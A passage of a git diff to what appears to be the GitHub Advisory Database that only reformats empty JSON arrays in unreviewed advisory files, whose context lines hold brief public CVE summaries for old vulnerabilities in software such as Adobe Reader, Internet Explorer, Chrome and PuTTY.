a/advisories/unreviewed/2022/05/GHSA-wqc4-x896-47jm/GHSA-wqc4-x896-47jm.json +++ b/advisories/unreviewed/2022/05/GHSA-wqc4-x896-47jm/GHSA-wqc4-x896-47jm.json @@ -7,12 +7,8 @@ "CVE-2015-7623" ], "details": "The ANAuthenticateResource method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, and CVE-2015-7620.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wr6f-rjpp-8f66/GHSA-wr6f-rjpp-8f66.json b/advisories/unreviewed/2022/05/GHSA-wr6f-rjpp-8f66/GHSA-wr6f-rjpp-8f66.json index 2d968491d16..9789eb407b6 100644 --- a/advisories/unreviewed/2022/05/GHSA-wr6f-rjpp-8f66/GHSA-wr6f-rjpp-8f66.json +++ b/advisories/unreviewed/2022/05/GHSA-wr6f-rjpp-8f66/GHSA-wr6f-rjpp-8f66.json @@ -7,12 +7,8 @@ "CVE-2010-3414" ], "details": "Google Chrome before 6.0.472.59 on Mac OS X does not properly implement file dialogs, which allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. NOTE: this issue exists because of an incorrect fix for CVE-2010-3112 on Mac OS X.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ww2c-2pfq-484j/GHSA-ww2c-2pfq-484j.json b/advisories/unreviewed/2022/05/GHSA-ww2c-2pfq-484j/GHSA-ww2c-2pfq-484j.json index 245a8f3edda..6e755a2d3c7 100644 --- a/advisories/unreviewed/2022/05/GHSA-ww2c-2pfq-484j/GHSA-ww2c-2pfq-484j.json +++ b/advisories/unreviewed/2022/05/GHSA-ww2c-2pfq-484j/GHSA-ww2c-2pfq-484j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ww8j-hjq3-7m8r/GHSA-ww8j-hjq3-7m8r.json b/advisories/unreviewed/2022/05/GHSA-ww8j-hjq3-7m8r/GHSA-ww8j-hjq3-7m8r.json index 6cffb2ca7ed..362bae04737 100644 --- a/advisories/unreviewed/2022/05/GHSA-ww8j-hjq3-7m8r/GHSA-ww8j-hjq3-7m8r.json +++ b/advisories/unreviewed/2022/05/GHSA-ww8j-hjq3-7m8r/GHSA-ww8j-hjq3-7m8r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wwg6-5h73-f2q4/GHSA-wwg6-5h73-f2q4.json b/advisories/unreviewed/2022/05/GHSA-wwg6-5h73-f2q4/GHSA-wwg6-5h73-f2q4.json index 5bfc35d7790..7b63a5b3a9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-wwg6-5h73-f2q4/GHSA-wwg6-5h73-f2q4.json +++ b/advisories/unreviewed/2022/05/GHSA-wwg6-5h73-f2q4/GHSA-wwg6-5h73-f2q4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wwwx-88mv-pg56/GHSA-wwwx-88mv-pg56.json b/advisories/unreviewed/2022/05/GHSA-wwwx-88mv-pg56/GHSA-wwwx-88mv-pg56.json index 524e27a6b14..60f8f62439a 100644 --- a/advisories/unreviewed/2022/05/GHSA-wwwx-88mv-pg56/GHSA-wwwx-88mv-pg56.json +++ b/advisories/unreviewed/2022/05/GHSA-wwwx-88mv-pg56/GHSA-wwwx-88mv-pg56.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x24m-9cvg-p9cr/GHSA-x24m-9cvg-p9cr.json b/advisories/unreviewed/2022/05/GHSA-x24m-9cvg-p9cr/GHSA-x24m-9cvg-p9cr.json index 22b5d2dff55..6cabf95bd43 100644 --- a/advisories/unreviewed/2022/05/GHSA-x24m-9cvg-p9cr/GHSA-x24m-9cvg-p9cr.json +++ b/advisories/unreviewed/2022/05/GHSA-x24m-9cvg-p9cr/GHSA-x24m-9cvg-p9cr.json @@ -7,12 +7,8 @@ "CVE-2015-5106" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and perform a transition from Low Integrity to Medium Integrity via unspecified vectors, a different vulnerability than CVE-2015-4446 and CVE-2015-5090.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x2r9-jfjp-jvp9/GHSA-x2r9-jfjp-jvp9.json b/advisories/unreviewed/2022/05/GHSA-x2r9-jfjp-jvp9/GHSA-x2r9-jfjp-jvp9.json index 69fefa94763..20ba6d1b652 100644 --- a/advisories/unreviewed/2022/05/GHSA-x2r9-jfjp-jvp9/GHSA-x2r9-jfjp-jvp9.json +++ b/advisories/unreviewed/2022/05/GHSA-x2r9-jfjp-jvp9/GHSA-x2r9-jfjp-jvp9.json @@ -7,12 +7,8 @@ "CVE-2010-4756" ], "details": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x35m-cvv2-x2rr/GHSA-x35m-cvv2-x2rr.json b/advisories/unreviewed/2022/05/GHSA-x35m-cvv2-x2rr/GHSA-x35m-cvv2-x2rr.json index 7a0626d152f..c90cadedd15 100644 --- a/advisories/unreviewed/2022/05/GHSA-x35m-cvv2-x2rr/GHSA-x35m-cvv2-x2rr.json +++ b/advisories/unreviewed/2022/05/GHSA-x35m-cvv2-x2rr/GHSA-x35m-cvv2-x2rr.json @@ -7,12 +7,8 @@ "CVE-2011-0248" ], "details": "Stack-based buffer overflow in the QuickTime ActiveX control in Apple QuickTime before 7.7 on Windows, when Internet Explorer is used, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTL file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x3v7-899j-3p69/GHSA-x3v7-899j-3p69.json b/advisories/unreviewed/2022/05/GHSA-x3v7-899j-3p69/GHSA-x3v7-899j-3p69.json index f3e048f6c19..171c9234a17 100644 --- a/advisories/unreviewed/2022/05/GHSA-x3v7-899j-3p69/GHSA-x3v7-899j-3p69.json +++ b/advisories/unreviewed/2022/05/GHSA-x3v7-899j-3p69/GHSA-x3v7-899j-3p69.json @@ -7,12 +7,8 @@ "CVE-2010-3330" ], "details": "Microsoft Internet Explorer 6 through 8 does not properly restrict script access to content from a different (1) domain or (2) zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka \"Cross-Domain Information Disclosure Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x4g3-938c-pqqc/GHSA-x4g3-938c-pqqc.json b/advisories/unreviewed/2022/05/GHSA-x4g3-938c-pqqc/GHSA-x4g3-938c-pqqc.json index 82e890a08f2..a291ebcb5ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-x4g3-938c-pqqc/GHSA-x4g3-938c-pqqc.json +++ b/advisories/unreviewed/2022/05/GHSA-x4g3-938c-pqqc/GHSA-x4g3-938c-pqqc.json @@ -7,12 +7,8 @@ "CVE-2015-6685" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) by using the Format action for unspecified fields, a different vulnerability than CVE-2015-6686, CVE-2015-6693, CVE-2015-6694, CVE-2015-6695, and CVE-2015-7622.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x4pj-xqp4-62g6/GHSA-x4pj-xqp4-62g6.json b/advisories/unreviewed/2022/05/GHSA-x4pj-xqp4-62g6/GHSA-x4pj-xqp4-62g6.json index c82807c242b..59d5ae4bc4d 100644 --- a/advisories/unreviewed/2022/05/GHSA-x4pj-xqp4-62g6/GHSA-x4pj-xqp4-62g6.json +++ b/advisories/unreviewed/2022/05/GHSA-x4pj-xqp4-62g6/GHSA-x4pj-xqp4-62g6.json @@ -7,12 +7,8 @@ "CVE-2012-2425" ], "details": "The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) handlers in HelpAsyncPluggableProtocol.dll in Intuit QuickBooks 2009 through 2012, when Internet Explorer is used, allow remote attackers to cause a denial of service (application crash) via a long URI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x52q-7vm6-fq5v/GHSA-x52q-7vm6-fq5v.json b/advisories/unreviewed/2022/05/GHSA-x52q-7vm6-fq5v/GHSA-x52q-7vm6-fq5v.json index 6e511562608..0b9242cc5f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-x52q-7vm6-fq5v/GHSA-x52q-7vm6-fq5v.json +++ b/advisories/unreviewed/2022/05/GHSA-x52q-7vm6-fq5v/GHSA-x52q-7vm6-fq5v.json @@ -7,12 +7,8 @@ "CVE-2011-0782" ], "details": "Google Chrome before 9.0.597.84 on Mac OS X does not properly mitigate an unspecified flaw in the Mac OS X 10.5 SSL libraries, which allows remote attackers to cause a denial of service (application crash) via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x52x-v8xm-9r9j/GHSA-x52x-v8xm-9r9j.json b/advisories/unreviewed/2022/05/GHSA-x52x-v8xm-9r9j/GHSA-x52x-v8xm-9r9j.json index 87e0f99e6d7..a691d04ae47 100644 --- a/advisories/unreviewed/2022/05/GHSA-x52x-v8xm-9r9j/GHSA-x52x-v8xm-9r9j.json +++ b/advisories/unreviewed/2022/05/GHSA-x52x-v8xm-9r9j/GHSA-x52x-v8xm-9r9j.json @@ -7,12 +7,8 @@ "CVE-2013-4852" ], "details": "Integer overflow in PuTTY 0.62 and earlier, WinSCP before 5.1.6, and other products that use PuTTY allows remote SSH servers to cause a denial of service (crash) and possibly execute arbitrary code in certain applications that use PuTTY via a negative size value in an RSA key signature during the SSH handshake, which triggers a heap-based buffer overflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x62g-3rgq-g655/GHSA-x62g-3rgq-g655.json b/advisories/unreviewed/2022/05/GHSA-x62g-3rgq-g655/GHSA-x62g-3rgq-g655.json index c81ada9158e..2900997a95f 100644 --- a/advisories/unreviewed/2022/05/GHSA-x62g-3rgq-g655/GHSA-x62g-3rgq-g655.json +++ b/advisories/unreviewed/2022/05/GHSA-x62g-3rgq-g655/GHSA-x62g-3rgq-g655.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x64q-v6mq-v3wh/GHSA-x64q-v6mq-v3wh.json b/advisories/unreviewed/2022/05/GHSA-x64q-v6mq-v3wh/GHSA-x64q-v6mq-v3wh.json index 82133fb2f8a..4a516c7d66e 100644 --- a/advisories/unreviewed/2022/05/GHSA-x64q-v6mq-v3wh/GHSA-x64q-v6mq-v3wh.json +++ b/advisories/unreviewed/2022/05/GHSA-x64q-v6mq-v3wh/GHSA-x64q-v6mq-v3wh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x6vf-3745-366m/GHSA-x6vf-3745-366m.json b/advisories/unreviewed/2022/05/GHSA-x6vf-3745-366m/GHSA-x6vf-3745-366m.json index 3988b4d6b0e..616f723bac6 100644 --- a/advisories/unreviewed/2022/05/GHSA-x6vf-3745-366m/GHSA-x6vf-3745-366m.json +++ b/advisories/unreviewed/2022/05/GHSA-x6vf-3745-366m/GHSA-x6vf-3745-366m.json @@ -7,12 +7,8 @@ "CVE-2010-3325" ], "details": "Microsoft Internet Explorer 6 through 8 does not properly handle unspecified special characters in Cascading Style Sheets (CSS) documents, which allows remote attackers to obtain sensitive information from a different (1) domain or (2) zone via a crafted web site, aka \"CSS Special Character Information Disclosure Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x753-r8m4-q2wg/GHSA-x753-r8m4-q2wg.json b/advisories/unreviewed/2022/05/GHSA-x753-r8m4-q2wg/GHSA-x753-r8m4-q2wg.json index f633937cee9..6de8224dc54 100644 --- a/advisories/unreviewed/2022/05/GHSA-x753-r8m4-q2wg/GHSA-x753-r8m4-q2wg.json +++ b/advisories/unreviewed/2022/05/GHSA-x753-r8m4-q2wg/GHSA-x753-r8m4-q2wg.json @@ -7,12 +7,8 @@ "CVE-2011-1347" ], "details": "Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x7h5-vp6w-g56r/GHSA-x7h5-vp6w-g56r.json b/advisories/unreviewed/2022/05/GHSA-x7h5-vp6w-g56r/GHSA-x7h5-vp6w-g56r.json index 08075401915..8e6d9d15306 100644 --- a/advisories/unreviewed/2022/05/GHSA-x7h5-vp6w-g56r/GHSA-x7h5-vp6w-g56r.json +++ b/advisories/unreviewed/2022/05/GHSA-x7h5-vp6w-g56r/GHSA-x7h5-vp6w-g56r.json @@ -7,12 +7,8 @@ "CVE-2012-2040" ], "details": "Untrusted search path vulnerability in the installer in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X; before 10.3.183.20 and 11.x before 11.2.202.236 on Linux; before 11.1.111.10 on Android 2.x and 3.x; and before 11.1.115.9 on Android 4.x, and Adobe AIR before 3.3.0.3610, allows local users to gain privileges via a Trojan horse executable file in an unspecified directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x7m5-r44w-528r/GHSA-x7m5-r44w-528r.json b/advisories/unreviewed/2022/05/GHSA-x7m5-r44w-528r/GHSA-x7m5-r44w-528r.json index 06e748ce43c..a94d62707fa 100644 --- a/advisories/unreviewed/2022/05/GHSA-x7m5-r44w-528r/GHSA-x7m5-r44w-528r.json +++ b/advisories/unreviewed/2022/05/GHSA-x7m5-r44w-528r/GHSA-x7m5-r44w-528r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x7v6-r6c2-98v3/GHSA-x7v6-r6c2-98v3.json b/advisories/unreviewed/2022/05/GHSA-x7v6-r6c2-98v3/GHSA-x7v6-r6c2-98v3.json index 15349ab742f..9bc5ec5604b 100644 --- a/advisories/unreviewed/2022/05/GHSA-x7v6-r6c2-98v3/GHSA-x7v6-r6c2-98v3.json +++ b/advisories/unreviewed/2022/05/GHSA-x7v6-r6c2-98v3/GHSA-x7v6-r6c2-98v3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x8q2-c58h-jr22/GHSA-x8q2-c58h-jr22.json b/advisories/unreviewed/2022/05/GHSA-x8q2-c58h-jr22/GHSA-x8q2-c58h-jr22.json index 66fc9710384..6e311ed81fc 100644 --- a/advisories/unreviewed/2022/05/GHSA-x8q2-c58h-jr22/GHSA-x8q2-c58h-jr22.json +++ b/advisories/unreviewed/2022/05/GHSA-x8q2-c58h-jr22/GHSA-x8q2-c58h-jr22.json @@ -7,12 +7,8 @@ "CVE-2011-1245" ], "details": "Microsoft Internet Explorer 6 and 7 does not properly restrict script access to content from a (1) different domain or (2) different zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka \"Javascript Information Disclosure Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xcm9-pjj3-347q/GHSA-xcm9-pjj3-347q.json b/advisories/unreviewed/2022/05/GHSA-xcm9-pjj3-347q/GHSA-xcm9-pjj3-347q.json index 2b457afd838..d1c6d5e7d8f 100644 --- a/advisories/unreviewed/2022/05/GHSA-xcm9-pjj3-347q/GHSA-xcm9-pjj3-347q.json +++ b/advisories/unreviewed/2022/05/GHSA-xcm9-pjj3-347q/GHSA-xcm9-pjj3-347q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xgq4-mggp-p859/GHSA-xgq4-mggp-p859.json b/advisories/unreviewed/2022/05/GHSA-xgq4-mggp-p859/GHSA-xgq4-mggp-p859.json index 4b7ae6b0bf9..92b88925ba5 100644 --- a/advisories/unreviewed/2022/05/GHSA-xgq4-mggp-p859/GHSA-xgq4-mggp-p859.json +++ b/advisories/unreviewed/2022/05/GHSA-xgq4-mggp-p859/GHSA-xgq4-mggp-p859.json @@ -7,12 +7,8 @@ "CVE-2015-5087" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3095, CVE-2015-5094, CVE-2015-5100, CVE-2015-5102, CVE-2015-5103, CVE-2015-5104, and CVE-2015-5115.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xh78-5j99-gwm4/GHSA-xh78-5j99-gwm4.json b/advisories/unreviewed/2022/05/GHSA-xh78-5j99-gwm4/GHSA-xh78-5j99-gwm4.json index 6277055a2e5..27e3af49989 100644 --- a/advisories/unreviewed/2022/05/GHSA-xh78-5j99-gwm4/GHSA-xh78-5j99-gwm4.json +++ b/advisories/unreviewed/2022/05/GHSA-xh78-5j99-gwm4/GHSA-xh78-5j99-gwm4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xhgh-27m4-wcgp/GHSA-xhgh-27m4-wcgp.json b/advisories/unreviewed/2022/05/GHSA-xhgh-27m4-wcgp/GHSA-xhgh-27m4-wcgp.json index c7d5ffdb66a..d9fba61922e 100644 --- a/advisories/unreviewed/2022/05/GHSA-xhgh-27m4-wcgp/GHSA-xhgh-27m4-wcgp.json +++ b/advisories/unreviewed/2022/05/GHSA-xhgh-27m4-wcgp/GHSA-xhgh-27m4-wcgp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xhq4-rjcc-mjrc/GHSA-xhq4-rjcc-mjrc.json b/advisories/unreviewed/2022/05/GHSA-xhq4-rjcc-mjrc/GHSA-xhq4-rjcc-mjrc.json index 85a8a28dba3..39fcb68125a 100644 --- a/advisories/unreviewed/2022/05/GHSA-xhq4-rjcc-mjrc/GHSA-xhq4-rjcc-mjrc.json +++ b/advisories/unreviewed/2022/05/GHSA-xhq4-rjcc-mjrc/GHSA-xhq4-rjcc-mjrc.json @@ -7,12 +7,8 @@ "CVE-2008-7295" ], "details": "Microsoft Internet Explorer cannot properly restrict modifications to cookies established in HTTPS sessions, which allows man-in-the-middle attackers to overwrite or delete arbitrary cookies via a Set-Cookie header in an HTTP response, related to lack of the HTTP Strict Transport Security (HSTS) includeSubDomains feature, aka a \"cookie forcing\" issue.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xjr2-qfhr-fgc6/GHSA-xjr2-qfhr-fgc6.json b/advisories/unreviewed/2022/05/GHSA-xjr2-qfhr-fgc6/GHSA-xjr2-qfhr-fgc6.json index dcc170be6af..ad6d02c3929 100644 --- a/advisories/unreviewed/2022/05/GHSA-xjr2-qfhr-fgc6/GHSA-xjr2-qfhr-fgc6.json +++ b/advisories/unreviewed/2022/05/GHSA-xjr2-qfhr-fgc6/GHSA-xjr2-qfhr-fgc6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xm42-x3fj-82gw/GHSA-xm42-x3fj-82gw.json b/advisories/unreviewed/2022/05/GHSA-xm42-x3fj-82gw/GHSA-xm42-x3fj-82gw.json index 3f4411b35af..a022b027a08 100644 --- a/advisories/unreviewed/2022/05/GHSA-xm42-x3fj-82gw/GHSA-xm42-x3fj-82gw.json +++ b/advisories/unreviewed/2022/05/GHSA-xm42-x3fj-82gw/GHSA-xm42-x3fj-82gw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xmcg-5rvr-g4j6/GHSA-xmcg-5rvr-g4j6.json b/advisories/unreviewed/2022/05/GHSA-xmcg-5rvr-g4j6/GHSA-xmcg-5rvr-g4j6.json index 6006fea882e..b7c4fb1bd20 100644 --- a/advisories/unreviewed/2022/05/GHSA-xmcg-5rvr-g4j6/GHSA-xmcg-5rvr-g4j6.json +++ b/advisories/unreviewed/2022/05/GHSA-xmcg-5rvr-g4j6/GHSA-xmcg-5rvr-g4j6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xmm3-99cm-jpgq/GHSA-xmm3-99cm-jpgq.json b/advisories/unreviewed/2022/05/GHSA-xmm3-99cm-jpgq/GHSA-xmm3-99cm-jpgq.json index 88a3881244a..19996970bb4 100644 --- a/advisories/unreviewed/2022/05/GHSA-xmm3-99cm-jpgq/GHSA-xmm3-99cm-jpgq.json +++ b/advisories/unreviewed/2022/05/GHSA-xmm3-99cm-jpgq/GHSA-xmm3-99cm-jpgq.json @@ -7,12 +7,8 @@ "CVE-2015-7650" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (out-of-bounds read and memory corruption) via a crafted CMAP table in a PDF document, a different vulnerability than CVE-2015-6685, CVE-2015-6686, CVE-2015-6693, CVE-2015-6694, CVE-2015-6695, and CVE-2015-7622.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xrhm-5q8w-r2vv/GHSA-xrhm-5q8w-r2vv.json b/advisories/unreviewed/2022/05/GHSA-xrhm-5q8w-r2vv/GHSA-xrhm-5q8w-r2vv.json index 3ef72879a10..d712c9e37bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-xrhm-5q8w-r2vv/GHSA-xrhm-5q8w-r2vv.json +++ b/advisories/unreviewed/2022/05/GHSA-xrhm-5q8w-r2vv/GHSA-xrhm-5q8w-r2vv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xw8f-m7g2-mq32/GHSA-xw8f-m7g2-mq32.json b/advisories/unreviewed/2022/05/GHSA-xw8f-m7g2-mq32/GHSA-xw8f-m7g2-mq32.json index 507c962e1fa..31001dea764 100644 --- a/advisories/unreviewed/2022/05/GHSA-xw8f-m7g2-mq32/GHSA-xw8f-m7g2-mq32.json +++ b/advisories/unreviewed/2022/05/GHSA-xw8f-m7g2-mq32/GHSA-xw8f-m7g2-mq32.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xx4r-v983-p5jq/GHSA-xx4r-v983-p5jq.json b/advisories/unreviewed/2022/05/GHSA-xx4r-v983-p5jq/GHSA-xx4r-v983-p5jq.json index 2ff608cb0fe..4251d1f17c4 100644 --- a/advisories/unreviewed/2022/05/GHSA-xx4r-v983-p5jq/GHSA-xx4r-v983-p5jq.json +++ b/advisories/unreviewed/2022/05/GHSA-xx4r-v983-p5jq/GHSA-xx4r-v983-p5jq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 